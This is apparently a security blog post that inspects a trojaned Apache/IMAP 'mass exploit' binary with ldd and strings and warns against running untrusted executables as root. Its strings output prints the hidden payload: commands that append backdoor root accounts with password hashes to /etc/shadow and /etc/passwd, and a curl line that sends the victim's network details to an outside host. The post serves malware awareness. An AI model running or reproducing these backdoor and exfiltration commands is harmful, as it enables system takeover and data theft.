This event struck me as unusual so I wanted to share with you why it's normal to be paranoid.
While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.
The grammatic structure of the message appears odd to say the least. Checking out the site there are two gzipped tarballs available for download. One includes the source code as well as a binary, the other is just precompiled binaries.
I wanted to show you how you can use the 'strings' command and 'ldd' to find information about an executable. Before you run an untrusted executable, especially as root
, you better know for darn sure what it is.
ldd will list libraries a dynamic executable is compiled against, in this case, the executable wasn't statically compiled.
luser@meowbox:~/Desktop$ ldd massxpl
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
Now, look what strings has to say:
luser@meowbox:~/Desktop$ strings massxpl
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
HEAD / HTTP/1.1
Root priviledge is needed - use your root user OK!
Rename your target list filename to target.txt
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d
As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users to your /etc/shadow file (newbie and toor) and then to your /etc/password file. It then connects to a HTTP server using curl and reports your IP addresses so the malware author can then come back and connect to you. (http://www.trancefix.org/hell/save.php
This is poor quality code. Several assumptions are made. Curl exists on the system and ifconfig will return a non IANA reserved address.
Either way, this should serve as a wake up call, malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking necessary caution you'll get owned.
Even if you don't know C read the source code, unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.